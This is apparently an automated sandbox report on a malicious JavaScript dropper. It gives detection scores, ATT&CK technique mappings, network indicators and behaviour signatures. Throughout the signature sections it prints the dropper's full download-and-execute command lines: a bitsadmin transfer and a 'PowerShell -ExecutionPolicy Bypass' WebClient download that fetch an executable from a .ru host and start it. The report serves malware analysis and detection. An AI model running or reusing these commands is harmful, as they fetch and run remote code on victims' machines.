Loading ...

Analysis Report 11Love_You_2019_35210544-txt.js

Overview

General Information

Joe Sandbox Version:25.0.0 Tiger's Eye
Analysis ID:102817
Start date:11.01.2019
Start time:20:05:49
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 21s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:11Love_You_2019_35210544-txt.js
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:12
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (Javascript)
Analysis stop reason:Timeout
Detection:MAL
Classification:mal76.evad.winJS@11/5@1/1
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .js
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, wermgr.exe, conhost.exe, CompatTelRunner.exe, svchost.exe
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold760 - 100Report FP / FNfalsemalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

All HTTP servers contacted by the sample do not resolve. Likely the sample is an old dropper which does no longer work
Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid AccountsCommand-Line Interface1BITS Jobs1Process Injection11Disabling Security Tools1Credential DumpingProcess Discovery1Application Deployment SoftwareData from Local SystemData CompressedStandard Non-Application Layer Protocol1
Replication Through Removable MediaPowerShell5Port MonitorsAccessibility FeaturesBITS Jobs1Network SniffingSecurity Software Discovery111Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Application Layer Protocol1
Drive-by CompromiseScripting51Accessibility FeaturesPath InterceptionProcess Injection11Input CaptureRemote System Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationCustom Cryptographic Protocol
Exploit Public-Facing ApplicationScheduled TaskSystem FirmwareDLL Search Order HijackingScripting51Credentials in FilesSystem Information Discovery1Logon ScriptsInput CaptureData EncryptedMultiband Communication
Spearphishing LinkCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessObfuscated Files or Information1Account ManipulationRemote System DiscoveryShared WebrootData StagedScheduled TransferStandard Cryptographic Protocol

Signature Overview

Click to jump to signature section


Software Vulnerabilities:

barindex
JavaScript source code contains functionality to generate code involving a shell, file or streamShow sources
Source: 11Love_You_2019_35210544-txt.jsArgument value : ['"cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile(\'http:']Go to definition

Networking:

barindex
JavaScript source code contains functionality to generate code involving HTTP requests or file downloadsShow sources
Source: 11Love_You_2019_35210544-txt.jsArgument value : ['"cmd.exe /c bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/kr']Go to definition
Source: 11Love_You_2019_35210544-txt.jsArgument value : ['"cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile(\'http:']Go to definition
Connects to country known for bullet proof hostersShow sources
Source: unknownNetwork traffic detected: IP: 92.63.197.48 Russian Federation
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 92.63.197.48 92.63.197.48
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)Show sources
Source: global trafficTCP traffic: 192.168.2.5:49794 -> 92.63.197.48:80
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: slpsrgpsrhojifdij.ru
Urls found in memory or binary dataShow sources
Source: powershell.exe, 00000009.00000002.4649132209.0000000002A2A000.00000004.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000009.00000003.4640479844.0000000006D44000.00000004.sdmpString found in binary or memory: http://crl.microsof
Source: powershell.exe, 00000009.00000003.4628787221.0000000006CEC000.00000004.sdmpString found in binary or memory: http://crl.microsoft.co
Source: powershell.exe, 00000009.00000002.4678066705.0000000005409000.00000004.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.4653094757.000000000451F000.00000004.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000009.00000002.4650783353.00000000043E0000.00000004.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000003.4619266330.0000000004E74000.00000004.sdmpString found in binary or memory: http://slpsrgpsrhojifdij.ru
Source: PowerShell_transcript.358075.TAzTFvVy.20190111200651.txt.9.drString found in binary or memory: http://slpsrgpsrhojifdij.ru/krablin.exe
Source: powershell.exe, 00000009.00000002.4653094757.000000000451F000.00000004.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000009.00000003.4640261841.0000000006D0A000.00000004.sdmpString found in binary or memory: http://www.microsoft.coU
Source: powershell.exe, 00000009.00000002.4678066705.0000000005409000.00000004.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.4678066705.0000000005409000.00000004.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.4678066705.0000000005409000.00000004.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000009.00000002.4653094757.000000000451F000.00000004.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000009.00000002.4678066705.0000000005409000.00000004.sdmpString found in binary or memory: https://nuget.org/nuget.exe

System Summary:

barindex
Powershell connects to networkShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 92.63.197.48 80Jump to behavior
Wscript starts Powershell (via cmd or directly)Show sources
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\user\AppData\Local\Temp\495958594939.exe&start C:\Users\user\AppData\Local\Temp\495958594939.exeJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'Jump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4356:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4244:120:WilError_01
Java / VBScript file with very long strings (likely obfuscated code)Show sources
Source: 11Love_You_2019_35210544-txt.jsInitial sample: Strings found which are bigger than 50
Reads the hosts fileShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Tries to load missing DLLsShow sources
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64log.dllJump to behavior
Classification labelShow sources
Source: classification engineClassification label: mal76.evad.winJS@11/5@1/1
Creates files inside the user directoryShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20190111Jump to behavior
Creates temporary filesShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zoulwcom.qry.ps1Jump to behavior
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dllJump to behavior
Reads ini filesShow sources
Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\SysWOW64\wscript.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\11Love_You_2019_35210544-txt.js'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\user\AppData\Local\Temp\495958594939.exe&start C:\Users\user\AppData\Local\Temp\495958594939.exe
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\user\AppData\Local\Temp\495958594939.exe
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\user\AppData\Local\Temp\495958594939.exe&start C:\Users\user\AppData\Local\Temp\495958594939.exeJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\user\AppData\Local\Temp\495958594939.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation:

barindex
Powershell starts a process from the temp directoryShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'Jump to behavior
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'Jump to behavior
JavaScript source code contains large arrays or strings with random content potentially encoding malicious codeShow sources
Source: 11Love_You_2019_35210544-txt.jsString : entropy: 5.32, length: 211, content: "cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http:Go to definition

Persistence and Installation Behavior:

barindex
Tries to download and execute files (via powershell)Show sources
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'Jump to behavior
Tries to download files via bitsadminShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\user\AppData\Local\Temp\495958594939.exe&start C:\Users\user\AppData\Local\Temp\495958594939.exe
Source: unknownProcess created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\user\AppData\Local\Temp\495958594939.exe
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\user\AppData\Local\Temp\495958594939.exe&start C:\Users\user\AppData\Local\Temp\495958594939.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\user\AppData\Local\Temp\495958594939.exeJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
